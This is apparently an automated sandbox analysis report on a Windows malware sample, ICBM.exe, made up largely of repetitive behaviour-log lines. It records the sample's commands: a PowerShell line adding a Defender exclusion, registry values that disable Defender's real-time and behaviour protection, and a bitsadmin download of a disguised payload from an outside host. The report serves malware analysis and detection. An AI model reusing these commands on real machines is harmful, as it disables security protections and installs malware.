Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msvchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\msvchost.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9907 Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Dropped PE file which has not been started: C:\Windows\System32\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\Desktop\ICBM.exe API coverage: 0.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep count: 9907 > 30 Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6120 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\msvchost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EB66C0 GetSystemInfo, 0_2_00007FF6D2EB66C0
Source: msvchost.exe, 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWqr
Source: svchost.exe, 0000000A.00000002.28219350002.0000020A80499000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
Source: msvchost.exe, 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: svchost.exe, 0000000A.00000002.28220723569.0000020AFE62A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.28219199616.0000020A8048C000.00000004.00000020.00020000.00000000.sdmp, msvchost.exe, 0000000D.00000002.28219496531.0000025943FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\"" Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\sc.exe "sc" start my_system_service Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\"" Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Process created: C:\Windows\System32\bitsadmin.exe "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Queries volume information: C:\IT VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Queries volume information: C:\Windows\System32\msvchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Queries volume information: C:\Windows\System32\msvchost.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ICBM.exe Code function: 0_2_00007FF6D2EE4FA8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6D2EE4FA8

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\Desktop\ICBM.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiVirus 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine Registry value created: MpEnablePus 0 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableOnAccessProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableScanOnRealtimeEnable 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting Registry value created: DisableEnhancedNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet Registry value created: DisableBlockAtFirstSeen 1 Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs